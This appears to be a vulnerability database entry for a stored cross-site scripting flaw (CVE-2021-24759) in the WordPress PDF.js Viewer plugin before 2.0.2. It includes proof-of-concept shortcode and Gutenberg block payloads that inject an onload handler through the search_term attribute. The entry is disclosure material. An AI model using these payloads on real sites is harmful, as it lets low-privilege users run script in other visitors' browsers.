Lucene search
Apple502jWPEX-ID:38274EF2-5100-4669-9544-A42346B6727DHistoryNov 08, 2021 - 12:00 a.m.
PDF.js Viewer < 2.0.2 - Contributor+ Stored Cross-Site Scripting
2021-11-0800:00:00
apple502j
92
pdf.js
viewer
cross-site scripting
stored
exploit
EPSS
0.001
Percentile
24.8%
The plugin does not escape some of its shortcode and Gutenberg Block attributes, which could allow users with a role as low as Contributor to to perform Cross-Site Scripting attacks
[pdfjs-viewer search_term='" onload="alert(/XSS/)']
<!-- wp:pdfjsblock/pdfjs-embed {"searchText":"this is ignored"} -->
<div class="wp-block-pdfjsblock-pdfjs-embed pdfjs-wrapper">[pdfjs-viewer viewer_width=0 viewer_height=800 url=undefined download=true print=true fullscreen=false fullscreen_target=false fullscreen_text="on" zoom=0 search_term='" onload="alert(/XSS/)' ]</div>
<!-- /wp:pdfjsblock/pdfjs-embed -->Related
nvd
nvd
CVE-2021-24759
2021-12-06 16:15:07
cve
cve
CVE-2021-24759
2021-12-06 16:15:07
cnvd
cnvd
WordPress PDF.js Viewer plugin cross-site scripting vulnerability
2021-12-09 00:00:00
cvelist
cvelist
patchstack
patchstack
wpvulndb
wpvulndb
PDF.js Viewer < 2.0.2 - Contributor+ Stored Cross-Site Scripting
2021-11-08 00:00:00
prion
prion
Cross site scripting
2021-12-06 16:15:00